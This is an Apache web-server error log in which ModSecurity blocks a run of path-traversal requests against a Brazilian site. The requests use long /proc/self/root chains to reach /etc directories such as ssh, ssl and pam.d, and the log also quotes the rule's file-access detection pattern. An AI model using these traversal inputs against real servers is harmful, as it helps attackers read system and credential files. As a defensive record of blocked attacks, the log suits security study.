[Thu Mar 19 03:23:56.765402 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:48612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWfAkwaGbbGflqUZB1jAAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:23:58.134335 2026] [mime_magic:error] [pid 17653:tid 140411658000128] (70014)End of file found: [client 57.141.18.85:47498] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:23:58.710021 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:39078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWfta6ubjKNq_cu4b_3gAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:24:02.429547 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.228.61:42822] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuWggbLMZ6AikZjR9Uf4AAAAAw"]
[Thu Mar 19 03:24:02.921365 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:51558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWgvu8EFLIOrSqIptgDgAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:24:17.033840 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46350] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:24:25.005097 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:48184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWmda6ubjKNq_cu4YABAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Thu Mar 19 03:24:47.124185 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:24:55.584034 2026] [mime_magic:error] [pid 31803:tid 140411666392832] (70014)End of file found: [client 57.141.18.59:48506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:25:18.122033 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47638] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:25:30.684783 2026] [mime_magic:error] [pid 15826:tid 140411590858496] (70014)End of file found: [client 57.141.18.94:49116] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:25:36.832497 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:39086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuW4Na6ubjKNq_cu4YASwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:25:50.171305 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48312] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:26:01.489075 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.241.31:39142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuW-QbLMZ6AikZjR9UgGAAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:26:20.129844 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48996] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:26:45.125771 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:26:56.543531 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:43698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXMAkwaGbbGflqUZB1_wAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:27:07.069835 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:27:12.019679 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:43698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXQAkwaGbbGflqUZB2DAAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:27:23.336259 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:59522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXSwkwaGbbGflqUZB2EwAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:27:29.140426 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:27:37.627122 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.241.31:52896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXWV_V7PWP6ixUYl5-5QAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:27:45.071431 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:48632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXYeyqAr6etmhZHNonlwAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:27:49.545566 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:37844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXZcdf6f5d65gmYZQ2AQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:27:51.035204 2026] [mime_magic:error] [pid 30077:tid 140411599251200] (70014)End of file found: [client 57.141.18.51:52480] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:27:53.106324 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51146] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:27:59.908619 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:37856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXb9a6ubjKNq_cu4YAvAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:28:00.487184 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:37856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXcNa6ubjKNq_cu4YAvgAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:28:03.096553 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:46674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXcwbLMZ6AikZjR9UgQgAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:28:16.057874 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51694] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:28:31.120495 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:33638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXj9a6ubjKNq_cu4YA3gAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:28:35.331712 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:46680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXkwbLMZ6AikZjR9UgWQAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:28:35.332400 2026] [mime_magic:error] [pid 14269:tid 140411557287680] (70014)End of file found: [client 74.7.241.31:46680] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:28:38.125913 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52174] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:28:39.450019 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:57022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXl-oXxyEfFpUF8f_UtQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
